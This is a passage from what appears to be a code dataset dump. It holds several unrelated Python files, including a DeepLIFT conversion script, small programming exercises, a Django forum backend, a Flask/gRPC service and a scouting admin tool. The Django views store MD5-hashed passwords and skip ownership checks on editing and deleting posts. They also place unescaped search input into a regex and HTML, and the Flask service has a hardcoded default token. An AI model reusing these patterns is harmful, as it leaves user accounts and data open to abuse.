weighted\n\t\tby proportion of strains with resistance data for any given drug\n\ty_pred: model-predicted y values\n\n\tReturns\n\t-------\n\tscalar value of the masked weighted accuracy.\n\t\"\"\"\n\n\ttotal = K.sum(K.cast(K.not_equal(alpha, 0.), K.floatx()))\n\ty_true_ = K.cast(K.greater(alpha, 0.), K.floatx())\n\tmask = K.cast(K.not_equal(alpha, 0.), K.floatx())\n\tcorrect = K.sum(K.cast(K.equal(y_true_, K.round(y_pred)), K.floatx()) * mask)\n\treturn correct / total\n\ndef convertKerasJSONtoDeepLIFT(kerasJSON_str):\n jsonData = json.loads(kerasJSON_str)\n layersData = jsonData[\"config\"][\"layers\"]\n jsonData[\"config\"] = layersData\n return json.dumps(jsonData)\n\n\n#create model\ndeeplift_trialweights = \"../model_training/saved_models/ccp_deepliftweights.h5\"\n\ndeeplift_model_json = \"CNN_model.json\"\n#\nfilter_size = 12\n\nmodel = keras.models.Sequential()\n\n#TODO: replace X.shape with passed argument\n\n##### Define the model (must be the same architecture as used for training)\nmodel.add(layers.Conv2D(\n 64, (4, filter_size),\n data_format='channels_last',\n activation='relu',\n input_shape = (4, 10291, 18), name='conv2d'\n))\nmodel.add(layers.Conv2D(64, (1,12), activation='relu', name='conv1d'))\nmodel.add(layers.MaxPooling2D((1,3), name='max_pooling1d'))\nmodel.add(layers.Conv2D(32, (1,3), activation='relu', name='conv1d_1'))\nmodel.add(layers.Conv2D(32, (1,3), activation='relu', name='conv1d_2'))\nmodel.add(layers.MaxPooling2D((1,3), name='max_pooling1d_1'))\nmodel.add(layers.Flatten(name='flatten'))\nmodel.add(layers.Dense(256, activation='relu', name='d1'))\nmodel.add(layers.Dense(256, activation='relu', name='d2'))\nmodel.add(layers.Dense(13, activation='sigmoid', name='d4'))\n\nmodel.compile(optimizer=Adam(lr=np.exp(-1.0 * 9)),\n loss=masked_multi_weighted_bce,\n metrics=[masked_weighted_accuracy])\n\nmodel.summary()\n\n#load weights\nmodel.load_weights(deeplift_trialweights)\n\n#save json\nmodel_json = model.to_json()\nwith open(deeplift_model_json, \"w\") as json_file:\n json_file.write(model_json)\n\nprint(\"model saved\")\n\n###### Step 4: Read in Deeplift model and define method (rules) to use for assessment#####\n## Load our model from the json file\nour_model = model_from_json(open(deeplift_model_json).read())\nour_model.load_weights(deeplift_trialweights)\n\n# Create the deeplift models\nmethod_to_model = OrderedDict()\n\nwith h5py.File(deeplift_trialweights) as keras_model_weights :\n\n for method_name, nonlinear_mxts_mode in [\n #The genomics default = rescale on conv layers, revealcance on fully-connected\n ('rescale_conv_revealcancel_fc', NonlinearMxtsMode.DeepLIFT_GenomicsDefault)]:\n method_to_model[method_name] = kc.convert_model_from_saved_files(\n h5_file=deeplift_trialweights,\n json_file=deeplift_model_json,\n nonlinear_mxts_mode=deeplift.layers.NonlinearMxtsMode.DeepLIFT_GenomicsDefault\n )\n\n\n###### Step 5: sanity check make sure that our predictions match with keras and deeplift#####\n\n###make sure predictions are the same as the original model\n\nmodel_to_test = method_to_model['rescale_conv_revealcancel_fc']\n\ndeeplift_prediction_func = compile_func([model_to_test.get_layers()[0].get_activation_vars()],\n model_to_test.get_layers()[-1].get_activation_vars())\n\noriginal_model_predictions = our_model.predict([X_h37rv], batch_size=200)\n\nconverted_model_predictions = deeplift.util.run_function_in_batches(\n input_data_list=[X_h37rv],\n func=deeplift_prediction_func,\n batch_size=200,\n progress_update=None)\n\nprint(original_model_predictions)\nprint(converted_model_predictions)\nprint(\"maximum difference in predictions:\",np.max(np.array(converted_model_predictions)-np.array(original_model_predictions)))\nassert np.max(np.array(converted_model_predictions)-np.array(original_model_predictions)) < 10**-5\n","sub_path":"md_cnn/deeplift/00.convert_model_to_deeplift.py","file_name":"00.convert_model_to_deeplift.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"571632358","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExercise 080\n\"\"\"\n\nalphabet1=\"abcdefghijklmnopqrstuvwxyz\"\nalphabet2=\"abcdefghijklmnopqrstuvwxyz\"\n\nsolution=[] \n\nfor first in alphabet1:\n for second in alphabet2:\n if first != second:\n combo=''.join(sorted(first + second))\n if combo not in solution:\n solution.insert(0,combo)\n\nfor pair in sorted(solution):\n print(pair)\n","sub_path":"exercices/080/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"344939969","text":"import time\nclass Timer: \n def __init__(self,time):\n self.time = time\n \n def __str__(self):\n return str(self.time)\n \n def countdown(self):\n countdown = self.time\n #countdown = int(input('Please enter number of seconds you want to countdown: '))\n while countdown > 0:\n print(countdown)\n time.sleep(1)\n countdown -= 1\n if countdown == 0:\n print('BLASTOFF!')\n break\n \ndef main():\n time = int(input('Please enter number of seconds you want to countdown: '))\n T = Timer(time)\n T.countdown()\n \nif __name__ == \"__main__\": \n main()\n \n ","sub_path":"problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"373101263","text":"\"\"\"\n1041\nrobot bounded in circle\nmedium\n\nOn an infinite plane, a robot initially stands at (0, 0) and faces north.\nThe robot can receive one of three instructions:\n\n\"G\": go straight 1 unit;\n\"L\": turn 90 degrees to the left;\n\"R\": turn 90 degrees to the right.\n\nThe robot performs the instructions given in order, and repeats them forever.\n\nReturn true if and only if there exists a circle in the plane such that the\nrobot never leaves the circle.\n\"\"\"\n\n\nclass Solution:\n def isRobotBounded(self, instructions: str) -> bool:\n left = instructions.count(\"L\")\n right = instructions.count(\"R\")\n if left % 4 != right % 4:\n return True\n\n x = [1, 0, -1, 0]\n y = [0, 1, 0, -1]\n\n left = right = dir = 0\n loc = [0, 0]\n for c in instructions:\n if c == \"G\":\n dir += (left-right)\n dir %= 4\n loc[0] += x[dir]\n loc[1] += y[dir]\n left = right = 0\n elif c == \"L\":\n left += 1\n else:\n right += 1\n if loc[0] == loc[1] == 0:\n return True\n else:\n return False\n\nstring = \"RRGRRGLLLRLGGLGLLGRLRLGLRLRRGLGGLLRRRLRLRLLGRGLGRRRGRLG\"\nsol = Solution()\nprint(sol.isRobotBounded(string))\n\n\n\n","sub_path":"Q1041.py","file_name":"Q1041.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"194968559","text":"import hashlib\nimport random\nimport re\nimport time\nimport io\nimport os\nimport uuid\nfrom _md5 import md5\n\nfrom django.conf import settings\nfrom django.contrib.auth.hashers import make_password\nfrom django.core.cache import cache\nfrom django.core.paginator import Paginator\nfrom django.core.serializers import json\nfrom django.db.models import Q, Count\nfrom django.http import HttpResponse, JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.template import loader\nfrom django.urls import reverse\nfrom django.views.decorators.cache import cache_page\n\nfrom app.models import Nav, Guest, Publishment, Announcement, Comment, CommentReply\nfrom app.toolfunc import md5HashPwd, createVcode\n\n\n\n# 首页\ndef index(request, pagenum=1):\n ptype = request.GET.get('ptype', None)\n # 根据帖子类型查询\n if ptype:\n publishment = Publishment.p_manager.filter(ptype=ptype).all().order_by('-paddtime')\n ptype = int(ptype)\n # 默认查询全部记录\n else:\n publishment = Publishment.p_manager.all().order_by('-paddtime')\n pager = Paginator(publishment, 5)\n pagePub = pager.page(pagenum)\n data = {\n 'pagePub': pagePub,\n 'pagerange': pager.page_range,\n 'pagecount': pager.num_pages,\n 'currentpage': pagePub.number,\n 'ptype': ptype,\n }\n return render(request, 'app/index.html', context=data)\n\n\n# 搜索\ndef search(request, pagenum):\n psearch = request.GET.get('psearch', None)\n publishment = Publishment.p_manager.filter(Q(ptitle__contains=psearch)).all().order_by('-paddtime')\n pager = Paginator(publishment, 3)\n pagePub = pager.page(pagenum)\n\n data = {\n 'pagePub': pagePub,\n 'pagerange': pager.page_range,\n 'pagecount': pager.num_pages,\n 'currentpage': pagePub.number,\n 'psearch': psearch\n }\n # return render(request, 'app/search.html', context=data)\n template = loader.get_template('app/search.html')\n content = template.render(context=data)\n rere = re.compile(r'\\*\\*(.*)(' + psearch + r')(.*)\\*\\*')\n result, n = rere.subn(r'\\1\\2\\3', content)\n return HttpResponse(result)\n\n\n# 注册\ndef register(request):\n if request.method == 'GET':\n return render(request, 'app/register.html')\n else:\n post = request.POST\n gname = post.get('nickname', None)\n gemail = post.get('email', None)\n gpwd = post.get('pwd', None)\n ggender = post.get('gender', None)\n cpwd = post.get('cpwd', None)\n vcode = post.get('vcode', None)\n errcode = 0\n msg = ''\n res = ''\n\n # validate data\n if not gname or not gemail or not gpwd or not ggender or not cpwd or not vcode:\n res = 'fail'\n errcode = 1\n msg = '所有信息都要填!'\n elif vcode.lower() != request.session['vcode'].lower():\n res = 'fail'\n errcode = 1\n msg = '验证码错误!'\n elif gpwd != cpwd:\n res = 'fail'\n errcode = 1\n msg = '两次输入的密码不一样!'\n elif Guest.objects.filter(gname=gname).first():\n res = 'fail'\n errcode = 1\n msg = '昵称已存在'\n else:\n # hash pwd\n gpwd = md5HashPwd(gpwd.strip())\n\n # save data\n try:\n guest = Guest()\n guest.gname = gname.strip()\n guest.ggender = ggender.strip()\n guest.gemail = gemail.strip()\n guest.gpwd = gpwd\n guest.save()\n\n # genarate account\n g = Guest.objects.filter(gname=gname).first()\n gaccount = str(g.id + 1000)\n g.gaccount = gaccount\n g.save()\n except BaseException as e:\n res = 'fail'\n errcode = 2\n msg = '服务器出了点小问题。。。'\n else:\n res = 'ok'\n errcode = 0\n msg = '注册成功,您的账号是 ' + gaccount + ',清牢记!'\n\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 登录\ndef login(request):\n if request.method == 'GET':\n return render(request, 'app/login.html')\n else:\n post = request.POST\n gaccount = post.get('account', None)\n gpwd = post.get('pwd', None)\n vcode = post.get('vcode', None)\n errcode = 0\n msg = ''\n res = ''\n if vcode.lower() != request.session['vcode'].lower():\n errcode = 1\n msg = '验证码错误!'\n res = 'fail'\n if gaccount and gpwd:\n # hash\n gpwd = md5HashPwd(gpwd)\n # validate\n g = Guest.objects.filter(gaccount=gaccount).first()\n if g and g.gpwd == gpwd:\n request.session['gname'] = g.gname\n request.session['gaccount'] = gaccount\n request.session['headphoto'] = 'uploads/' + g.gphoto.name\n errcode = 0\n msg = '登录成功!'\n res = 'ok'\n else:\n errcode = 1\n msg = '登录失败,账号或密码错误!'\n res = 'fail'\n else:\n errcode = 1\n msg = '所有参数都要填写!'\n res = 'fail'\n\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 退出账号\ndef logout(request):\n\n request.session.flush()\n return render(request, 'app/logout.html')\n\n\n# 个人信息\ndef myinfo(request):\n guest = Guest.objects.filter(gname=request.session.get('gname',None)).first()\n data = {\n 'guest': guest,\n 'gphoto': 'uploads/' + guest.gphoto.name\n }\n return render(request, 'app/myinfo.html', context=data)\n\n\n# 获取验证码\ndef getVcode(request):\n vcodeinfo = createVcode(4)\n request.session['vcode'] = vcodeinfo[0]\n return HttpResponse(vcodeinfo[1], 'image/png')\n\n\n# 更新密码\ndef modifypwd(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'POST':\n gname = request.session.get('gname', None)\n oldpwd = request.POST.get('oldpwd', None)\n npwd = request.POST.get('npwd', None)\n cpwd = request.POST.get('cpwd', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not oldpwd or not npwd or not cpwd:\n errcode = 1\n msg = '所有字段都是必填的!'\n res = 'fail'\n elif npwd != cpwd:\n errcode = 1\n msg = '两次输入的密码不一样!'\n res = 'fail'\n else:\n guest = Guest.objects.filter(gname=gname).first()\n if guest.gpwd != md5HashPwd(oldpwd.strip()):\n errcode = 1\n msg = '修改失败,原密码错误!'\n res = 'fail'\n else:\n try:\n guest.gpwd = md5HashPwd(npwd.strip())\n guest.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n else:\n errcode = 0\n msg = '修改成功!请尝试用新的密码登录!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 设置头像\ndef setphoto(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'POST':\n gname = request.session.get('gname', None)\n photo = request.FILES.get('photo', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not photo:\n errcode = 1\n msg = '未上传任何图片'\n res = 'fail'\n\n else:\n try:\n photo.name = ''.join(str(uuid.uuid4()).split('-'))\n guest = Guest.objects.filter(gname=gname).first()\n guest.gphoto = photo\n guest.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n print(e)\n else:\n errcode = 0\n msg = '头像设置成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 发布页面\n@cache_page(60*60, cache='redis_cache')\ndef publishPage(request):\n return render(request, 'app/publish.html')\n\n\n# 发布\ndef publish(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'POST':\n gname = request.session.get('gname', None)\n post = request.POST\n ptitle = post.get('ptitle', None)\n ptype = post.get('ptype', None)\n pcontent = post.get('pcontent', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not ptitle or not ptype or not pcontent:\n errcode = 1\n msg = '所有字段都是必填的!'\n res = 'fail'\n elif len(ptitle) > 20:\n errcode = 1\n msg = '标题太长了!'\n res = 'fail'\n else:\n pguest = Guest.objects.filter(gname=gname).first()\n ptype = Nav.n_manager.filter(id=ptype).first()\n\n try:\n publishment = Publishment()\n publishment.ptitle = ptitle\n publishment.pcontent = pcontent\n publishment.ptype = ptype\n publishment.pguest = pguest\n publishment.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n print(e)\n else:\n errcode = 0\n msg = '发布成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 发布的内容详情\ndef detail(request, pubId):\n pub = Publishment.p_manager.all().filter(id=pubId).first()\n # 根据session判断是否点击过\n isclick = request.session.get('isclick' + pubId, None)\n print(isclick)\n if not isclick:\n pub.pclick = pub.pclick + 1\n pub.save()\n request.session['isclick' + pubId] = 1\n\n comment = Comment.objects.filter(cbelong=pubId).all()\n # print(comment)\n data = {\n 'publish': pub,\n 'comment': comment\n }\n return render(request, 'app/detail.html', context=data)\n\n\n# 我的帖子\ndef myPublish(request, pagenum):\n gname = request.session.get('gname', None)\n if gname:\n guest = Guest.objects.filter(gname=gname).first()\n publishment = Publishment.p_manager.filter(pguest=guest).all()\n pager = Paginator(publishment, 4)\n pagePub = pager.page(pagenum)\n\n data = {\n 'pagePub': pagePub,\n 'pagerange': pager.page_range,\n 'pagecount': pager.num_pages,\n 'currentpage': pagePub.number,\n }\n return render(request, 'app/mypublish.html', context=data)\n else:\n return render(request, 'app/login.html')\n\n\n# 编辑帖子\ndef editPublish(request, pubId):\n if request.method == 'POST':\n errcode = 0\n msg = ''\n res = ''\n gname = request.session.get('gname', None)\n post = request.POST\n ptitle = post.get('ptitle', None)\n ptype = post.get('ptype', None)\n pcontent = post.get('pcontent', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not ptitle or not ptype or not pcontent:\n errcode = 1\n msg = '所有字段都是必填的!'\n res = 'fail'\n elif len(ptitle) > 20:\n errcode = 1\n msg = '标题太长了!'\n res = 'fail'\n elif not Publishment.p_manager.filter(id=pubId).first():\n errcode = 1\n msg = '帖子不存在!'\n res = 'fail'\n else:\n try:\n publishment = Publishment.p_manager.get(pk=pubId)\n publishment.ptitle = ptitle\n publishment.pcontent = pcontent\n publishment.ptype = Nav.n_manager.filter(id=ptype).first()\n publishment.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n print(e)\n else:\n errcode = 0\n msg = '保存成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n else:\n pub = Publishment.p_manager.get(pk=pubId)\n data = {\n 'publish': pub,\n 'pubId': pubId,\n }\n return render(request, 'app/editpublish.html', context=data)\n\n\n# 公告详情\n@cache_page(60*60, cache='redis_cache')\ndef announce(request, anId):\n announce = Announcement.a_manager.filter(id=anId).first()\n data = {\n 'announce': announce,\n }\n return render(request, 'app/announcement.html', context=data)\n\n\n# 删除帖子\ndef delPublish(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'GET':\n pubId = request.GET.get('pubid', None)\n gname = request.session.get('gname', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not pubId:\n errcode = 1\n msg = '参数缺失'\n res = 'fail'\n elif not Publishment.p_manager.filter(id=pubId).first():\n errcode = 1\n msg = '帖子不存在!'\n res = 'fail'\n else:\n try:\n publishment = Publishment.p_manager.get(pk=pubId)\n publishment.pisdelete = True\n publishment.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n print(e)\n else:\n errcode = 0\n msg = '删除成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 评论帖子\ndef comment(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'POST':\n gname = request.session.get('gname', None)\n ccontent = request.POST.get('ccontent', None)\n cbelong = request.POST.get('cbelong', None)\n\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not ccontent or not cbelong:\n errcode = 1\n msg = '参数缺失'\n res = 'fail'\n elif not Publishment.p_manager.filter(id=cbelong).all().first():\n errcode = 1\n msg = '帖子不存在'\n res = 'fail'\n else:\n try:\n cauthor = Guest.objects.filter(gname=gname).all().first()\n comment = Comment()\n comment.ccontent = ccontent\n comment.cbelong = Publishment.p_manager.filter(id=cbelong).all().first()\n comment.cauthor = cauthor\n comment.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n else:\n errcode = 0\n msg = '评论成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n# 回复用户的评论\ndef replyComment(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'POST':\n gname = request.session.get('gname', None)\n crcontent = request.POST.get('crcontent', None)\n crcomment = request.POST.get('crcomment', None)\n crto = request.POST.get('crto', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not crcontent or not crcomment or not crto:\n errcode = 1\n msg = '参数缺失'\n res = 'fail'\n elif not Comment.objects.filter(id=crcomment).all().first():\n errcode = 1\n msg = '主评论不存在'\n res = 'fail'\n else:\n try:\n crauthor = Guest.objects.filter(gname=gname).all().first()\n commentreply = CommentReply()\n commentreply.crauthor = crauthor\n commentreply.crcontent = crcontent\n commentreply.crcomment = Comment.objects.filter(id=crcomment).all().first()\n commentreply.crto = Guest.objects.filter(id=crto).all().first()\n commentreply.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n else:\n errcode = 0\n msg = '回复成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })","sub_path":"firstapp/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"243357692","text":"n = int(input())\np = [0, 0]\ntime = 0\n\nfor _ in range(n):\n t, x, y = map(int, input().split())\n dist = abs(x-p[0]) + abs(y-p[1])\n if dist > t-time:\n print('No')\n exit()\n else:\n if (t-time)%dist==0:\n time += dist\n p = [x, y]\n else:\n print('No')\n exit()\n\nprint('Yes')","sub_path":"atcoder/2018/ABC/0121_abc086/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"233426599","text":"import flask\nfrom flask import app, abort, jsonify, request\n\nimport grpc\nimport sys\nimport os\n\nsys.path.append(\"./proto\")\nfrom src.foo.proto import service_pb2 as pb2\nfrom src.foo.proto import service_pb2_grpc as pb2_grpc\n\nimport logging\nfrom pythonjsonlogger import jsonlogger\n\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n# Environment variables\nip = os.getenv(\"LIS_IP\", \"0.0.0.0\")\nport = os.getenv(\"LIS_PORT\", \"4000\")\nbar_endpoint = os.getenv(\"BAR_ENDPOINT\", \"bar:4001\")\nauth_token = os.getenv(\"AUTH_TOKEN\", \"123456abcdef\")\n\n# Logs\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\nhandler = logging.FileHandler(\"logs_foo.log\", mode=\"a\")\nformatter = jsonlogger.JsonFormatter(\"%(asctime)s %(name)s %(levelname)s %(message)s\")\nhandler.setFormatter(formatter)\nlog.addHandler(handler)\nlog.info(\"Initialized\")\n\n\n# Error handlers\n@app.errorhandler(400)\ndef bad_request(error):\n log.info(\"bad request\")\n response = {\"Message\": \"Bad request\", \"Code\": \"400\"}\n return jsonify(response), 400\n\n\n@app.errorhandler(401)\ndef bad_request(error):\n log.info(\"unaothorized\")\n response = {\"Message\": \"unauthorized\", \"Code\": \"401\"}\n return jsonify(response), 401\n\n\n@app.errorhandler(503)\ndef service_unavailable(error):\n log.info(\"service unavailable\")\n response = {\"Message\": \"Service unavailable\", \"Code\": \"503\"}\n return jsonify(response), 503\n\n\ndef authentication(token):\n if token != auth_token:\n abort(401)\n\n\n@app.route(\"/foo\", methods=[\"GET\"])\ndef home():\n\n log.info(\"/foo called\")\n\n try:\n with grpc.insecure_channel(bar_endpoint) as channel:\n stub = pb2_grpc.BarServiceStub(channel)\n response = stub.BarFunc(pb2.Request(a=True))\n except grpc.RpcError:\n abort(503)\n\n return f\"foo{response.result}\"\n\n\n@app.route(\"/foos\", methods=[\"GET\"])\ndef homes():\n\n log.info(\"/foos called\")\n\n try:\n authentication(request.headers[\"Authorization\"].split()[1])\n\n with grpc.insecure_channel(bar_endpoint) as channel:\n stub = pb2_grpc.BarServiceStub(channel)\n response = stub.BarFunc(pb2.Request(a=True))\n except grpc.RpcError:\n abort(503)\n\n return f\"foo{response.result}\"\n\n\ntry:\n app.run(host=ip, port=port)\nexcept grpc.RpcError:\n abort(503)\n","sub_path":"src/foo/foo.py","file_name":"foo.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"188050624","text":"'''\nSCOUT ADMIN\n'''\n\nimport json\nimport csv\nimport math\nimport os\nimport requests\nimport urllib2\nclear = lambda: os.system('clear')\nfrom stringcolor import * \ntabRed1 = []\ntabRed2 = []\ntabRed3 = []\ntabBlue1 = []\ntabBlue2 = []\ntabBlue3 = []\nflagString = \"\"\nhelpMenu = True\ndef internet_on():\n try:\n urllib2.urlopen('http://216.58.192.142', timeout=1)\n return True\n except urllib2.URLError as err: \n return False\nmatchNum = 1\ndef TryFile(fileName, station):\n try:\n open(fileName, \"r\")\n return 1\n except IOError:\n print(\"[ERROR] \" + station + \"'s Specified File Doesn't Exist!\")\n return 0\n\nif(TryFile(\"ScoutAdmin.csv\", \"Scouting Admin\") == 1):\n print(\"Importing previous data...\")\n with open(\"ScoutAdmin.csv\") as thistoread:\n dataarray = []\n csv_reader = csv.reader(thistoread, delimiter=\",\")\n #READABLE FORMAT\n for csvconvert in csv_reader:\n dataarray.append(csvconvert)\n numberofmatches = 0\n for num in dataarray:\n numberofmatches += 1\n print(\"There are \" + str(numberofmatches/6) + \" matches loaded in from the previous session...\")\n TOTAL_MATCH_NUM = round(numberofmatches/6)\n for x in range(TOTAL_MATCH_NUM):\n tabBlue1.append(\"U\")\n tabBlue2.append(\"U\")\n tabBlue3.append(\"U\")\n tabRed1.append(\"U\")\n tabRed2.append(\"U\")\n tabRed3.append(\"U\")\n loadIndex = 0\n for tabletFlag in dataarray:\n if(dataarray[loadIndex][0].lower() == \"blue1\"):\n tabBlue1[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n elif(dataarray[loadIndex][0].lower() == \"blue2\"):\n tabBlue2[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n elif(dataarray[loadIndex][0].lower() == \"blue3\"):\n tabBlue3[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n elif(dataarray[loadIndex][0].lower() == \"red1\"):\n tabRed1[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n elif(dataarray[loadIndex][0].lower() == \"red2\"):\n tabRed2[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n elif(dataarray[loadIndex][0].lower() == \"red3\"):\n tabRed3[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n loadIndex += 1\n print(tabBlue1)\n input()\n print(\"Done!\")\nelse:\n TOTAL_MATCH_NUM = int(input(\"How many matches are there?\\n> \"))\n for x in range(TOTAL_MATCH_NUM):\n tabBlue1.append(\"U\")\n tabBlue2.append(\"U\")\n tabBlue3.append(\"U\")\n tabRed1.append(\"U\")\n tabRed2.append(\"U\")\n tabRed3.append(\"U\")\n print(tabBlue1)\n\n \n\n\n\nwhile True:\n clear()\n userChoice = input(\"\"\" \"\"\" + cs(\"\", \"magenta\").bold() +\"\"\"\n\n \"\"\" + \n cs(\"Red Team \",\"white\",\"red\") + \"\"\" \"\"\" + cs(\"Blue Team \",\"white\",\"blue\") + \"\"\"\n \"\"\" +\n cs(\"R1 R2 R3 \", \"white\",\"red\").underline() + \"\"\" \"\"\" + cs(\"B1 B2 B3 \",\"white\",\"blue\").underline() + \"\"\"\n \"\"\"\n + (cs(\"\\u2713\", \"green\").bold() if tabRed1[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold()) + \"\"\" \"\"\" + (cs(\"\\u2713\", \"green\").bold() if tabRed2[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold()) + \"\"\" \"\"\" + (cs(\"\\u2713\", \"green\").bold() if tabRed3[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold()) + \"\"\" \"\"\" + (cs(\"\\u2713\", \"green\").bold() if tabBlue1[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold()) + \"\"\" \"\"\" + (cs(\"\\u2713\", \"green\").bold() if tabBlue2[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold()) + \"\"\" \"\"\" + (cs(\"\\u2713\", \"green\").bold() if tabBlue3[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold())+ \"\"\"\n\"\"\" + \n (\"\"\"\n *******************************\n \"N\" to go to next match (Match \"\"\" + str(matchNum+1) + \"\"\")\n \"P\" to go to previous match (Match \"\"\" + str(matchNum-1 if matchNum > 1 else 1) + \"\"\")\n \"SET\" to set current match\n \"H\" to disable help menu\n *******************************\n \"E\" to exit flag and save\n *******************************\n \"F\" to flag a tablet match\n \"U\" to mark a tablet as usable\\n> \"\"\" if helpMenu == True else \"\"\"\n [F] Flag\n [U] Unflag\n [H] Help Menu\\n> \"\"\")).upper()\n if(userChoice == \"SET\"):\n matchNum = int(input(\"Which match would you like to switch to?\\n> \"))\n if(matchNum > len(tabBlue1)):\n matchNum = len(tabBlue1)\n elif(matchNum < 1):\n matchNum = 1\n elif(userChoice == \"N\"):\n if(matchNum < len(tabBlue1)):\n matchNum += 1\n elif(userChoice == \"P\"):\n if(matchNum > 1):\n matchNum -= 1\n elif(userChoice == \"H\"):\n if(helpMenu == True):\n helpMenu = False\n else:\n helpMenu = True\n elif(userChoice == \"E\"):\n open(\"ScoutAdmin.csv\", \"w\").close()\n flaggedOutput = open(\"ScoutAdmin.csv\", \"w\")\n flagString = \"\"\n index = 0\n print(tabBlue1[3])\n for x in range(len(tabBlue1)):\n flagString = flagString + \"Blue1,\" + str(x+1) + \",\" + tabBlue1[x] + \"\\n\"\n index += 1\n index = 0\n for x in range(len(tabBlue2)):\n flagString = flagString + \"Blue2,\" + str(x+1) + \",\" + tabBlue2[x] + \"\\n\"\n index += 1\n index = 0\n for x in range(len(tabBlue3)):\n flagString = flagString + \"Blue3,\" + str(x+1) + \",\" + tabBlue3[x] + \"\\n\"\n index += 1\n index = 0\n for x in range(len(tabRed1)):\n flagString = flagString + \"Red1,\" + str(x+1) + \",\" + tabRed1[x] + \"\\n\"\n index += 1\n index = 0\n for x in range(len(tabRed2)):\n flagString = flagString + \"Red2,\" + str(x+1) + \",\" + tabRed2[x] + \"\\n\"\n index += 1\n index = 0\n for x in range(len(tabRed3)):\n flagString = flagString + \"Red3,\" + str(x+1) + \",\" + tabRed3[x] + \"\\n\"\n index += 1\n flaggedOutput.write(flagString)\n flaggedOutput.close()\n break\n elif(userChoice == \"DA\"):\n print(\"Deteting Flags\")\n elif(userChoice == \"F\"):\n tabletFlagged = input(\"What color tablet? (Red or Blue)\\n> \")\n tabletNumber = int(input(\"What number tablet? (1, 2, or 3)\\n> \"))\n if(tabletFlagged.lower() == \"blue\"):\n if(tabletNumber == 1):\n tabBlue1[matchNum-1] = 